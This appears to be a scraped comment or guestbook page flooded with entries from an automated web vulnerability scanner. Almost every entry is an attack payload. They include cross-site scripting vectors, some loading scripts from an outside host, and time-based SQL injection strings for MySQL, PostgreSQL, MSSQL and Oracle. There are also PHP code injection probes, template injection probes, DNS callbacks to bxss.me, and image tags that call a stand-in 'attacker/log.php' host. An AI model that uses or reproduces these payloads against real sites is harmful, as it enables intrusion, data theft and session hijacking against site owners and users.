  1402/04/28 18:44

  555

  ".gethostbyname(lc("hitjo"."uckihptq6e50c.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(78).chr(98).chr(85)."
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  Mr.
  1402/04/28 18:44

  ';print(md5(31337));$a='

  Mr.
  1402/04/28 18:44

  ";print(md5(31337));$a="

  Mr.
  1402/04/28 18:44

  ${@print(md5(31337))}

  Mr.
  1402/04/28 18:44

  ${@print(md5(31337))}\

  Mr.
  1402/04/28 18:44

  '.print(md5(31337)).'

  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  ';print(md5(31337));$a='
  1402/04/28 18:44

  555

  ";print(md5(31337));$a="
  1402/04/28 18:44

  555

  ${@print(md5(31337))}
  1402/04/28 18:44

  555

  ${@print(md5(31337))}\
  1402/04/28 18:44

  555

  '.print(md5(31337)).'
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  555

  '"()
  1402/04/28 18:44

  555

  UWrK3njQ')) OR 811=(SELECT 811 FROM PG_SLEEP(15))--
  1402/04/28 18:44

  555

  Mr.'&&sleep(27*1000)*qcwhyx&&'
  1402/04/28 18:44

  555

  Mr."&&sleep(27*1000)*okymjf&&"
  1402/04/28 18:44

  555

  Mr.'||sleep(27*1000)*xddjvi||'
  1402/04/28 18:44

  555

  Mr."||sleep(27*1000)*bgpunz||"
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  -1; waitfor delay '0:0:15' --

  Mr.
  1402/04/28 18:44

  HttP://bxss.me/t/xss.html?%00

  Mr.
  1402/04/28 18:44

  bxss.me/t/xss.html?%00

  HttP://bxss.me/t/xss.html?%00
  1402/04/28 18:44

  555

  bxss.me/t/xss.html?%00
  1402/04/28 18:44

  555

  Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  1402/04/28 18:44

  555

  1'"
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  "+"A".concat(70-3).concat(22*4).concat(121).concat(70).concat(109).concat(79)+(require"socket"
  Socket.gethostbyname("hitta"+"kmzzxbcn510d8.bxss.me.")[3].to_s)+"

  1�%C0%A7%C0%A2%2527%2522
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA

  Mr.
  1402/04/28 18:44

  '+'A'.concat(70-3).concat(22*4).concat(114).concat(66).concat(104).concat(75)+(require'socket'
  Socket.gethostbyname('hithg'+'vbhrrloj7c926.bxss.me.')[3].to_s)+'

  Mr.
  1402/04/28 18:44

  555

  @@iSmfY
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA

  "+"A".concat(70-3).concat(22*4).concat(103).concat(68).concat(104).concat(84)+(require"socket" Socket.gethostbyname("hitaq"+"ooxqrbvs5c853.bxss.me.")[3].to_s)+"
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA/.

  Mr.
  1402/04/28 18:44

  -1); waitfor delay '0:0:15' --

  '+'A'.concat(70-3).concat(22*4).concat(110).concat(75).concat(106).concat(67)+(require'socket' Socket.gethostbyname('hitrg'+'cmyhxgdbdc31d.bxss.me.')[3].to_s)+'
  1402/04/28 18:44

  555

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA
  1402/04/28 18:44

  555

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA�
  1402/04/28 18:44

  555

  %D8%B4%D8%B1%DA%A9%D8%AA-%D9%84%D9%88%DA%A9%D8%A7%D8%B1%D8%AA/.
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  xfs.bxss.me

  Mr.
  1402/04/28 18:44

  555

  xfs.bxss.me
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  1 waitfor delay '0:0:15' --

  Mr.
  1402/04/28 18:44

  '"

  Mr.
  1402/04/28 18:44

  <!--

  '"
  1402/04/28 18:44

  555

  <!--
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  555'"()&%<zzz><ScRiPt >nAXB(9112)</ScRiPt>

  Mr.
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  555'"()&%<zzz><ScRiPt >gigk(9356)</ScRiPt>

  Mr.
  1402/04/28 18:44

  '"()&%<zzz><ScRiPt >nAXB(9754)</ScRiPt>

  Mr.
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  hOpcB1aM'; waitfor delay '0:0:15' --

  Mr.
  1402/04/28 18:44

  '"()&%<zzz><ScRiPt >gigk(9022)</ScRiPt>

  Mr.
  1402/04/28 18:44

  5559640185

  Mr.'"()&%<zzz><ScRiPt >FYnM(9241)</ScRiPt>
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  5559090950

  Mr.
  1402/04/28 18:44

  bfg3560<s1﹥s2ʺs3ʹhjl3560

  Mr.
  1402/04/28 18:44

  555

  '"()&%<zzz><ScRiPt >FYnM(9835)</ScRiPt>
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  bfgx1810%C0%BEz1%C0%BCz2a%90bcxhjl1810

  Mr.
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  555

  Mr.9448375
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  <%={{={@{#{${dfb}}%>

  Mr.
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  -5 OR 855=(SELECT 855 FROM PG_SLEEP(15))--

  Mr.
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:44

  <th:t="${dfb}#foreach

  Mr.
  1402/04/28 18:44

  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

  Mr.
  1402/04/28 18:44

  dfb{{98991*97996}}xca

  Mr.
  1402/04/28 18:44

  dfb[[${98991*97996}]]xca

  Mr.
  1402/04/28 18:44

  555

  Mr.
  1402/04/28 18:45

  -5) OR 813=(SELECT 813 FROM PG_SLEEP(15))--

  Mr.
  1402/04/28 18:45

  dfb__${98991*97996}__::.x

  Mr.
  1402/04/28 18:45

  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

  Mr.
  1402/04/28 18:45

  555<ScRiPt >nAXB(9998)</ScRiPt>

  Mr.
  1402/04/28 18:45

  555<WJI2V8>SK6KZ[!+!]</WJI2V8>

  Mr.
  1402/04/28 18:45

  555<script>nAXB(9463)</script>

  Mr.
  1402/04/28 18:45

  -1)) OR 364=(SELECT 364 FROM PG_SLEEP(15))--

  Mr.
  1402/04/28 18:45

  555<ScR<ScRiPt>IpT>nAXB(9908)</sCr<ScRiPt>IpT>

  Mr.
  1402/04/28 18:45

  555<ScRiPt
  >nAXB(9365)</ScRiPt>

  Mr.
  1402/04/28 18:45

  555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9965></ScRiPt>

  Mr.
  1402/04/28 18:45

  iVvGzGwv' OR 359=(SELECT 359 FROM PG_SLEEP(15))--

  Mr.
  1402/04/28 18:45

  555<ScRiPt
  >nAXB(9089)</ScRiPt>

  Mr.
  1402/04/28 18:45

  555<svg  

  %A0onload=nAXB(9087);>

  Mr.
  1402/04/28 18:45

  555<isindex type=image src=1 onerror=nAXB(9839)>

  Mr.
  1402/04/28 18:45

  555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9513'>

  Mr.
  1402/04/28 18:45

  IH0kuyhU') OR 546=(SELECT 546 FROM PG_SLEEP(15))--

  Mr.
  1402/04/28 18:45

  555<body onload=nAXB(9354)>

  Mr.
  1402/04/28 18:45

  555<img src=//xss.bxss.me/t/dot.gif onload=nAXB(9875)>

  Mr.
  1402/04/28 18:45

  555<img src=xyz OnErRor=nAXB(9350)>

  Mr.
  1402/04/28 18:45

  Pz7qZ1G9')) OR 366=(SELECT 366 FROM PG_SLEEP(15))--

  Mr.
  1402/04/28 18:45

  555<img/src=">" onerror=alert(9761)>

  Mr.
  1402/04/28 18:45

  %35%35%35%3C%53%63%52%69%50%74%20%3E%6E%41%58%42%289102%29%3C%2F%73%43%72%69%70%54%3E

  Mr.
  1402/04/28 18:45

  555\u003CScRiPt\nAXB(9874)\u003C/sCripT\u003E

  Mr.
  1402/04/28 18:45

  555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

  Mr.
  1402/04/28 18:45

  555&lt;ScRiPt&gt;nAXB(9185)&lt;/sCripT&gt;

  Mr.
  1402/04/28 18:46

  %F6<img zzz onmouseover=nAXB(97571) //%F6>

  Mr.
  1402/04/28 18:46

  555<input autofocus onfocus=nAXB(9862)>

  Mr.
  1402/04/28 18:46

  555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  Mr.
  1402/04/28 18:46

  1'"

  Mr.
  1402/04/28 18:46

  1%C0%A7%C0%A2%2527%2522

  Mr.
  1402/04/28 18:46

  <a HrEF=http://xss.bxss.me></a>

  Mr.
  1402/04/28 18:46

  @@XV1LP

  Mr.
  1402/04/28 18:46

  <a HrEF=jaVaScRiPT:>

  Mr.
  1402/04/28 18:46

  555}body{zzz:Expre/**/SSion(nAXB(9108))}

  Mr.
  1402/04/28 18:46

  555xVAoX
  <ScRiPt >nAXB(9002)</ScRiPt>

  Mr.
  1402/04/28 18:46

  555

  Mr.
  1402/04/28 18:46

  555<WSRNIO>A9GOG[!+!]</WSRNIO>

  Mr.
  1402/04/28 18:46

  555<ifRAme sRc=9425.com></IfRamE>

  Mr.
  1402/04/28 18:46

  555<ajm9ks2 x=9510>

  Mr.
  1402/04/28 18:46

  555

  -1 OR 2+499-499-1=0+0+0+1 --
  1402/04/28 18:46

  555

  -1 OR 2+575-575-1=0+0+0+1
  1402/04/28 18:46

  555

  -1' OR 2+384-384-1=0+0+0+1 --
  1402/04/28 18:46

  555

  -1' OR 2+402-402-1=0+0+0+1 or '20ASqntU'='
  1402/04/28 18:46

  555

  Mr.
  1402/04/28 18:46

  555<img sRc='http://attacker-9881/log.php?

  -1" OR 2+820-820-1=0+0+0+1 --
  1402/04/28 18:46

  555

  Mr.
  1402/04/28 18:46

  555<aPDOZKQ<

  Mr.'"()&%<zzz><ScRiPt >nAXB(9118)</ScRiPt>
  1402/04/28 18:46

  555

  '"()&%<zzz><ScRiPt >nAXB(9464)</ScRiPt>
  1402/04/28 18:46

  555

  Mr.9342495
  1402/04/28 18:46

  555

  if(now()=sysdate(),sleep(15),0)
  1402/04/28 18:46

  555

  bfg1020<s1﹥s2ʺs3ʹhjl1020
  1402/04/28 18:46

  555

  bfgx6842%C0%BEz1%C0%BCz2a%90bcxhjl6842
  1402/04/28 18:46

  555

  <%={{={@{#{${dfb}}%>
  1402/04/28 18:46

  555

  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
  1402/04/28 18:46

  555

  <th:t="${dfb}#foreach
  1402/04/28 18:46

  555

  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
  1402/04/28 18:47

  555

  dfb{{98991*97996}}xca
  1402/04/28 18:47

  555

  dfb[[${98991*97996}]]xca
  1402/04/28 18:47

  555

  dfb__${98991*97996}__::.x
  1402/04/28 18:47

  555

  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
  1402/04/28 18:47

  555

  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
  1402/04/28 18:47

  555

  Mr.<ScRiPt >nAXB(9885)</ScRiPt>
  1402/04/28 18:47

  555

  Mr.<WAWY8Z>7GX9I[!+!]</WAWY8Z>
  1402/04/28 18:47

  555

  Mr.<script>nAXB(9889)</script>
  1402/04/28 18:47

  555

  Mr.<ScR<ScRiPt>IpT>nAXB(9046)</sCr<ScRiPt>IpT>
  1402/04/28 18:47

  555

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
  1402/04/28 18:47

  555

  Mr.<ScRiPt >nAXB(9591)</ScRiPt>
  1402/04/28 18:47

  555

  Mr.<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9778></ScRiPt>
  1402/04/28 18:47

  555

  Mr.<�ScRiPt >nAXB(9493)</ScRiPt>
  1402/04/28 18:47

  555

  Mr.<svg %A0�onload=nAXB(9965);>
  1402/04/28 18:47

  555

  Mr.<isindex type=image src=1 onerror=nAXB(9451)>
  1402/04/28 18:47

  555

  1 waitfor delay '0:0:15' --
  1402/04/28 18:47

  555

  Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9108'>
  1402/04/28 18:47

  555

  Mr.<body onload=nAXB(9308)>
  1402/04/28 18:47

  555

  Mr.<img src=//xss.bxss.me/t/dot.gif onload=nAXB(9205)>
  1402/04/28 18:47

  555

  Mr.<img src=xyz OnErRor=nAXB(9342)>
  1402/04/28 18:48

  555

  Mr.<img/src=">" onerror=alert(9867)>
  1402/04/28 18:48

  555

  %4D%72%2E%3C%53%63%52%69%50%74%20%3E%6E%41%58%42%289901%29%3C%2F%73%43%72%69%70%54%3E
  1402/04/28 18:48

  555

  c5YCsnrE'; waitfor delay '0:0:15' --
  1402/04/28 18:48

  555

  Mr.\u003CScRiPt\nAXB(9411)\u003C/sCripT\u003E
  1402/04/28 18:48

  555

  Mr.&lt;ScRiPt&gt;nAXB(9717)&lt;/sCripT&gt;
  1402/04/28 18:48

  555

  %F6<img zzz onmouseover=nAXB(94601) //%F6>
  1402/04/28 18:48

  555

  Mr.<input autofocus onfocus=nAXB(9229)>
  1402/04/28 18:48

  555

  <a HrEF=http://xss.bxss.me></a>
  1402/04/28 18:48

  555

  qKP7lWdF' OR 896=(SELECT 896 FROM PG_SLEEP(15))--
  1402/04/28 18:48

  555

  <a HrEF=jaVaScRiPT:>
  1402/04/28 18:48

  555

  Mr.}body{zzz:Expre/**/SSion(nAXB(9651))}
  1402/04/28 18:48

  555

  Mr.ZJlbc <ScRiPt >nAXB(9759)</ScRiPt>
  1402/04/28 18:48

  555

  Mr.<WTQCAH>OAQKQ[!+!]</WTQCAH>
  1402/04/28 18:48

  555

  Mr.<ifRAme sRc=9282.com></IfRamE>
  1402/04/28 18:48

  555

  Mr.<a60Nilo x=9628>
  1402/04/28 18:48

  555

  YNSVRjrG') OR 732=(SELECT 732 FROM PG_SLEEP(15))--
  1402/04/28 18:48

  555

  Mr.<img sRc='http://attacker-9806/log.php?
  1402/04/28 18:48

  555

  Mr.<avOWHej<
  1402/04/28 18:48

  555

  Mr.
  1402/04/28 18:48

  555

  Mr.
  1402/04/28 18:48

  555

  ddWV2OsS')) OR 14=(SELECT 14 FROM PG_SLEEP(15))--
  1402/04/28 18:48

  555

  Mr.
  1402/04/28 18:49

  555

  Mr.'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
  1402/04/28 18:49

  555

  1'"
  1402/04/28 18:49

  555

  1�%C0%A7%C0%A2%2527%2522
  1402/04/28 18:49

  555

  @@mwEAG
  1402/04/28 18:49

  555

  Mr.
  1402/04/28 18:49

  555

  Mr.
  1402/04/28 18:49

  555

  Mr.
  1402/04/28 18:49

  555

  Mr.
  1402/04/28 18:52

  555

  Mr.
  1402/04/29 01:39

  555

  Mr.
  1402/04/29 01:39

  555

  Mr.
  1402/04/29 01:39

  555

  Mr.'"()&%<zzz><ScRiPt >GntX(9120)</ScRiPt>
  1402/04/29 01:40

  555

  '"()&%<zzz><ScRiPt >GntX(9633)</ScRiPt>
  1402/04/29 01:40

  555

  Mr.9399063
  1402/04/29 01:40

  555

  bfg4767<s1﹥s2ʺs3ʹhjl4767
  1402/04/29 01:40

  555

  bfgx9243%C0%BEz1%C0%BCz2a%90bcxhjl9243
  1402/04/29 01:41

  555

  <%={{={@{#{${dfb}}%>
  1402/04/29 01:41

  555

  <th:t="${dfb}#foreach
  1402/04/29 01:41

  555

  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
  1402/04/29 01:41

  555

  dfb{{98991*97996}}xca
  1402/04/29 01:41

  555

  dfb[[${98991*97996}]]xca
  1402/04/29 01:41

  555

  Mr.
  1402/04/29 01:41

  555'"()&%<zzz><ScRiPt >q61Q(9951)</ScRiPt>

  dfb__${98991*97996}__::.x
  1402/04/29 01:41

  555

  Mr.
  1402/04/29 01:41

  '"()&%<zzz><ScRiPt >q61Q(9513)</ScRiPt>

  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
  1402/04/29 01:41

  555

  Mr.
  1402/04/29 01:41

  5559669670

  Mr.<ScRiPt >GntX(9693)</ScRiPt>
  1402/04/29 01:41

  555

  Mr.
  1402/04/29 01:42

  bfg5342<s1﹥s2ʺs3ʹhjl5342

  Mr.<WJNHIY>WRV0W[!+!]</WJNHIY>
  1402/04/29 01:42

  555

  Mr.
  1402/04/29 01:42

  bfgx9933%C0%BEz1%C0%BCz2a%90bcxhjl9933

  Mr.<script>GntX(9696)</script>
  1402/04/29 01:42

  555

  Mr.
  1402/04/29 01:42

  <%={{={@{#{${dfb}}%>

  Mr.<ScR<ScRiPt>IpT>GntX(9099)</sCr<ScRiPt>IpT>
  1402/04/29 01:42

  555

  Mr.
  1402/04/29 01:42

  <th:t="${dfb}#foreach

  Mr.<ScRiPt >GntX(9854)</ScRiPt>
  1402/04/29 01:42

  555

  Mr.
  1402/04/29 01:42

  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

  Mr.<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9645></ScRiPt>
  1402/04/29 01:42

  555

  Mr.
  1402/04/29 01:42

  dfb{{98991*97996}}xca

  Mr.<�ScRiPt >GntX(9652)</ScRiPt>
  1402/04/29 01:42

  555

  Mr.
  1402/04/29 01:42

  dfb[[${98991*97996}]]xca

  Mr.<svg %A0�onload=GntX(9705);>
  1402/04/29 01:42

  555

  Mr.
  1402/04/29 01:42

  dfb__${98991*97996}__::.x

  Mr.
  1402/04/29 01:43

  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

  Mr.<isindex type=image src=1 onerror=GntX(9830)>
  1402/04/29 01:43

  555

  Mr.
  1402/04/29 01:43

  555<ScRiPt >q61Q(9922)</ScRiPt>

  Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9712'>
  1402/04/29 01:43

  555

  Mr.
  1402/04/29 01:43

  555<WXIGIA>EVJID[!+!]</WXIGIA>

  Mr.<body onload=GntX(9375)>
  1402/04/29 01:43

  555

  Mr.
  1402/04/29 01:43

  555<script>q61Q(9089)</script>

  Mr.<img src=//xss.bxss.me/t/dot.gif onload=GntX(9517)>
  1402/04/29 01:43

  555

  Mr.
  1402/04/29 01:43

  555<ScR<ScRiPt>IpT>q61Q(9504)</sCr<ScRiPt>IpT>

  Mr.<img src=xyz OnErRor=GntX(9417)>
  1402/04/29 01:43

  555

  Mr.<img/src=">" onerror=alert(9549)>
  1402/04/29 01:43

  555

  Mr.
  1402/04/29 01:43

  555<ScRiPt
  >q61Q(9501)</ScRiPt>

  %4D%72%2E%3C%53%63%52%69%50%74%20%3E%47%6E%74%58%289309%29%3C%2F%73%43%72%69%70%54%3E
  1402/04/29 01:43

  555

  Mr.
  1402/04/29 01:43

  555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9634></ScRiPt>

  Mr.\u003CScRiPt\GntX(9122)\u003C/sCripT\u003E
  1402/04/29 01:43

  555

  Mr.
  1402/04/29 01:43

  555<ScRiPt
  >q61Q(9648)</ScRiPt>

  Mr.&lt;ScRiPt&gt;GntX(9573)&lt;/sCripT&gt;
  1402/04/29 01:44

  555

  Mr.
  1402/04/29 01:44

  555<svg  

  %A0onload=q61Q(9812);>

  %F6<img zzz onmouseover=GntX(92191) //%F6>
  1402/04/29 01:44

  555

  Mr.
  1402/04/29 01:44

  555<isindex type=image src=1 onerror=q61Q(9054)>

  Mr.<input autofocus onfocus=GntX(9644)>
  1402/04/29 01:44

  555

  Mr.
  1402/04/29 01:44

  555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9311'>

  <a HrEF=http://xss.bxss.me></a>
  1402/04/29 01:44

  555

  Mr.
  1402/04/29 01:44

  555<body onload=q61Q(9254)>

  <a HrEF=jaVaScRiPT:>
  1402/04/29 01:44

  555

  Mr.
  1402/04/29 01:44

  555<img src=//xss.bxss.me/t/dot.gif onload=q61Q(9506)>

  Mr.}body{zzz:Expre/**/SSion(GntX(9425))}
  1402/04/29 01:44

  555

  Mr.
  1402/04/29 01:44

  555<img src=xyz OnErRor=q61Q(9454)>

  Mr.eFqOK <ScRiPt >GntX(9471)</ScRiPt>
  1402/04/29 01:44

  555

  Mr.
  1402/04/29 01:44

  555<img/src=">" onerror=alert(9506)>

  Mr.<W6E7NY>ZFLBO[!+!]</W6E7NY>
  1402/04/29 01:44

  555

  Mr.
  1402/04/29 01:44

  %35%35%35%3C%53%63%52%69%50%74%20%3E%71%36%31%51%289560%29%3C%2F%73%43%72%69%70%54%3E

  Mr.<ifRAme sRc=9771.com></IfRamE>
  1402/04/29 01:44

  555

  Mr.
  1402/04/29 01:44

  555\u003CScRiPt\q61Q(9412)\u003C/sCripT\u003E

  Mr.<aYXRL55 x=9750>
  1402/04/29 01:45

  555

  Mr.
  1402/04/29 01:45

  555&lt;ScRiPt&gt;q61Q(9098)&lt;/sCripT&gt;

  Mr.<img sRc='http://attacker-9442/log.php?
  1402/04/29 01:45

  555

  Mr.
  1402/04/29 01:45

  %F6<img zzz onmouseover=q61Q(92811) //%F6>

  Mr.<a7WWeOQ<
  1402/04/29 01:45

  555

  Mr.
  1402/04/29 01:45

  555<input autofocus onfocus=q61Q(9816)>

  Mr.
  1402/04/29 01:45

  <a HrEF=http://xss.bxss.me></a>

  Mr.
  1402/04/29 01:45

  <a HrEF=jaVaScRiPT:>

  Mr.
  1402/04/29 01:45

  555}body{zzz:Expre/**/SSion(q61Q(9270))}

  Mr.
  1402/04/29 01:45

  5550zos4
  <ScRiPt >q61Q(9828)</ScRiPt>

  Mr.
  1402/04/29 01:45

  555<WRINAL>XFNIF[!+!]</WRINAL>

  Mr.
  1402/04/29 01:45

  555<ifRAme sRc=9615.com></IfRamE>

  Mr.
  1402/04/29 01:45

  555<a53Gawz x=9197>

  Mr.
  1402/04/29 01:45

  555<img sRc='http://attacker-9433/log.php?

  Mr.
  1402/04/29 01:46

  555<aRCWWsg<

  Mr.
  1402/04/29 08:54

  555'"()&%<zzz><ScRiPt >UOYm(9420)</ScRiPt>

  Mr.'"()&%<zzz><ScRiPt >ReF6(9954)</ScRiPt>
  1402/04/29 08:54

  555

  '"()&%<zzz><ScRiPt >ReF6(9926)</ScRiPt>
  1402/04/29 08:54

  555

  Mr.
  1402/04/29 08:54

  '"()&%<zzz><ScRiPt >UOYm(9609)</ScRiPt>

  Mr.9690190
  1402/04/29 08:54

  555

  Mr.
  1402/04/29 08:54

  5559118982

  bfg10742<s1﹥s2ʺs3ʹhjl10742
  1402/04/29 08:55

  555

  Mr.
  1402/04/29 08:55

  bfg2914<s1﹥s2ʺs3ʹhjl2914

  bfgx4895%C0%BEz1%C0%BCz2a%90bcxhjl4895
  1402/04/29 08:55

  555

  Mr.
  1402/04/29 08:55

  bfgx10331%C0%BEz1%C0%BCz2a%90bcxhjl10331

  <%={{={@{#{${dfb}}%>
  1402/04/29 08:55

  555

  <th:t="${dfb}#foreach
  1402/04/29 08:55

  555

  Mr.
  1402/04/29 08:55

  <%={{={@{#{${dfb}}%>

  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
  1402/04/29 08:55

  555

  Mr.
  1402/04/29 08:55

  <th:t="${dfb}#foreach

  dfb{{98991*97996}}xca
  1402/04/29 08:55

  555

  Mr.
  1402/04/29 08:55

  1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

  dfb[[${98991*97996}]]xca
  1402/04/29 08:55

  555

  Mr.
  1402/04/29 08:55

  dfb{{98991*97996}}xca

  dfb__${98991*97996}__::.x
  1402/04/29 08:55

  555

  Mr.
  1402/04/29 08:55

  dfb[[${98991*97996}]]xca

  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
  1402/04/29 08:55

  555

  Mr.
  1402/04/29 08:56

  dfb__${98991*97996}__::.x

  Mr.<ScRiPt >ReF6(9158)</ScRiPt>
  1402/04/29 08:56

  555

  Mr.
  1402/04/29 08:56

  "dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

  Mr.<WS5K8X>Q2D8D[!+!]</WS5K8X>
  1402/04/29 08:56

  555

  Mr.
  1402/04/29 08:56

  555<ScRiPt >UOYm(9955)</ScRiPt>

  Mr.
  1402/04/29 08:56

  555<WPQHB8>QCZS1[!+!]</WPQHB8>

  Mr.<script>ReF6(9135)</script>
  1402/04/29 08:56

  555

  Mr.
  1402/04/29 08:56

  555<script>UOYm(9947)</script>

  Mr.<ScR<ScRiPt>IpT>ReF6(9712)</sCr<ScRiPt>IpT>
  1402/04/29 08:56

  555

  Mr.
  1402/04/29 08:56

  555<ScR<ScRiPt>IpT>UOYm(9006)</sCr<ScRiPt>IpT>

  Mr.<ScRiPt >ReF6(9969)</ScRiPt>
  1402/04/29 08:56

  555

  Mr.<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9050></ScRiPt>
  1402/04/29 08:57

  555

  Mr.
  1402/04/29 08:57

  555<ScRiPt
  >UOYm(9540)</ScRiPt>

  Mr.<�ScRiPt >ReF6(9307)</ScRiPt>
  1402/04/29 08:57

  555

  Mr.
  1402/04/29 08:57

  555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9912></ScRiPt>

  Mr.<svg %A0�onload=ReF6(9268);>
  1402/04/29 08:57

  555

  Mr.
  1402/04/29 08:57

  555<ScRiPt
  >UOYm(9680)</ScRiPt>

  Mr.<isindex type=image src=1 onerror=ReF6(9709)>
  1402/04/29 08:57

  555

  Mr.
  1402/04/29 08:57

  555<svg  

  %A0onload=UOYm(9771);>

  Mr.<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9135'>
  1402/04/29 08:57

  555

  Mr.
  1402/04/29 08:57

  555<isindex type=image src=1 onerror=UOYm(9299)>

  Mr.<body onload=ReF6(9654)>
  1402/04/29 08:57

  555

  Mr.
  1402/04/29 08:57

  555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9528'>

  Mr.<img src=//xss.bxss.me/t/dot.gif onload=ReF6(9386)>
  1402/04/29 08:58

  555

  Mr.
  1402/04/29 08:58

  555<body onload=UOYm(9598)>

  Mr.<img src=xyz OnErRor=ReF6(9389)>
  1402/04/29 08:58

  555

  Mr.
  1402/04/29 08:58

  555<img src=//xss.bxss.me/t/dot.gif onload=UOYm(9190)>

  Mr.<img/src=">" onerror=alert(9982)>
  1402/04/29 08:58

  555

  Mr.
  1402/04/29 08:58

  555<img src=xyz OnErRor=UOYm(9499)>

  %4D%72%2E%3C%53%63%52%69%50%74%20%3E%52%65%46%36%289581%29%3C%2F%73%43%72%69%70%54%3E
  1402/04/29 08:58

  555

  Mr.
  1402/04/29 08:58

  555<img/src=">" onerror=alert(9967)>

  Mr.\u003CScRiPt\ReF6(9855)\u003C/sCripT\u003E
  1402/04/29 08:58

  555

  Mr.
  1402/04/29 08:58

  %35%35%35%3C%53%63%52%69%50%74%20%3E%55%4F%59%6D%289853%29%3C%2F%73%43%72%69%70%54%3E

  Mr.&lt;ScRiPt&gt;ReF6(9761)&lt;/sCripT&gt;
  1402/04/29 08:58

  555

  Mr.
  1402/04/29 08:58

  555\u003CScRiPt\UOYm(9875)\u003C/sCripT\u003E

  %F6<img zzz onmouseover=ReF6(96941) //%F6>
  1402/04/29 08:59

  555

  Mr.
  1402/04/29 08:59

  555&lt;ScRiPt&gt;UOYm(9164)&lt;/sCripT&gt;

  Mr.<input autofocus onfocus=ReF6(9635)>
  1402/04/29 08:59

  555

  Mr.
  1402/04/29 08:59

  %F6<img zzz onmouseover=UOYm(91021) //%F6>

  Mr.
  1402/04/29 08:59

